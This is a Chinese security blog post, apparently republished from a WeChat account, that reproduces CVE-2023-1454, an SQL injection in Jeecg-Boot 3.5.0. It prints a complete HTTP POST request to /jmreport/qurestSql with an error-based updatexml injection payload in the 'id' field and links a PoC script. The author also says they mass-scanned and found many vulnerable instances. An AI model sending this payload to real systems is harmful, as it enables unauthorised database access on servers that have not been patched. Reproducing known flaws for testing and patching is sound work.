【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

admin

103806
文章

87
评论

2023年6月28日07:34:04评论204 views字数 742阅读2分28秒阅读模式

漏洞简述

jeecg-boot3.5.0版本存在SQL注入漏洞，该漏洞源于文件 jmreport/qurestSql 存在安全问题，通过参数 apiSelectId 导致SQL注入。

漏洞影响

jeecg-boot 3.5.0版本

环境搭建

项目GitHub地址：https://github.com/zhangdaiscott/jeecg-boot环境搭建参考：https://blog.csdn.net/qq_27536045/article/details/129944987

漏洞复现

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 127.0.0.1Content-Type: application/jsonContent-Length: 126{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

写个脚本批量跑一下发现还是特多的，嗯~很“刑”。

【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

顺便更新到 Nuclei 插件里面去。

【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

获取 POC

获取POC脚本

https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

End

原文始发于微信公众号（贝雷帽SEC）：【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】Jeecg-Boot- CVE-2023-1454（POC）

获取POC脚本

致远ucpclogin密码重置踩坑记录

5秒绕过Google reCAPTCHA验证码

IT知识百科：什么是MultiGig以太网？

堆攻击迭代历程

Linux下内网渗透FRP代理和Viper代理对比

从零开始的木马免杀到上线，附工具

TongWeb历史补丁分析及利用方法

深入解析：真实案例揭示CC攻击实施流程及防范策略

记某次红蓝对抗(内附小工具 NaturalTeeth v1.2)

《mysql执行xpcmd》

发表评论

在线咨询

微信